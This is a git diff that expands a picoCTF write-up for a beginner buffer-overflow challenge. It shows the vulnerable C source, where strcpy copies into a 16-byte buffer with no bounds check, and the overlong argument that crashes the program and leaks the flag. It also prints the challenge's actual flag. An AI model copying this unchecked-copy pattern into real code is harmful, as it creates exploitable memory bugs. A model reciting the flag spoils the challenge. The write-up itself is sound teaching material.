@@ -13,9 +13,73 @@ Binary Exploitation
13
13
> If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.
14
14
15
15
## Solution
16
- Simple buffer overflow question
16
+ We can try pwning the binary locally first. Firstly, create a file _ flag.txt _ and add some contents into it.
17
17
18
- Working solution [ solve.sh] ( solution/solve.py )
18
+ Do a sample run of the program.
19
+
20
+ ```
21
+ $ ./vuln
22
+ This program takes 1 argument.
23
+ ```
24
+
25
+ Ok, now we try with an argument
26
+
27
+ ```
28
+ $ ./vuln AAAA
29
+ Thanks! Received: AAAA
30
+ ```
31
+
32
+ Seems like it's redirecting the input into output. Let's take a look at the source code.
33
+
34
+ ``` c
35
+ // Imports here...
36
+ // Define flag size here...
37
+ void sigsegv_handler (int sig) {
38
+ fprintf(stderr, "%s\n", flag);
39
+ fflush(stderr);
40
+ exit(1);
41
+ }
42
+
43
+ void vuln(char * input){
44
+ char buf[ 16] ;
45
+ strcpy(buf, input);
46
+ }
47
+
48
+ int main(int argc, char ** argv){
49
+ // Reading flag here...
50
+ signal(SIGSEGV, sigsegv_handler);
51
+ // gid settings here...
52
+ if (argc > 1) {
53
+ vuln(argv[ 1] );
54
+ printf("Thanks! Received: %s", argv[ 1] );
55
+ }
56
+ else
57
+ printf("This program takes 1 argument.\n");
58
+ return 0;
59
+ }
60
+ ```
61
+
62
+ It looks like the `signal(SIGSEGV, sigsegv_handler)` redirects execution to `sigsegv_handler()` and prints the flag.
63
+
64
+ In `vuln()`, there is no boundary checking, so even though there is only space for 16 bytes, it `strcpy()` will keep inserting bytes into `buf`.
65
+
66
+ We can try running the program again, but this time, with a lot more characters.
67
+
68
+ ```
69
+ $ ./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA
70
+ picoCTF{sample_flag}
71
+ ```
72
+
73
+ We did it locally! It takes 28 or more bytes to leak out the flag.
74
+
75
+ All we have to do is send it to the webshell.
76
+
77
+ ```
78
+ $ /problems/buffer-overflow-0_2_aab3d2a22456675a9f9c29783b256a3d/vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAA
79
+ picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}
80
+ ```
81
+
82
+ Working solution [solve.py](solution/solve.py)
19
83
20
84
### Flag
21
85
`picoCTF{ov3rfl0ws_ar3nt_that_bad_5d8a1fae}`
0 commit comments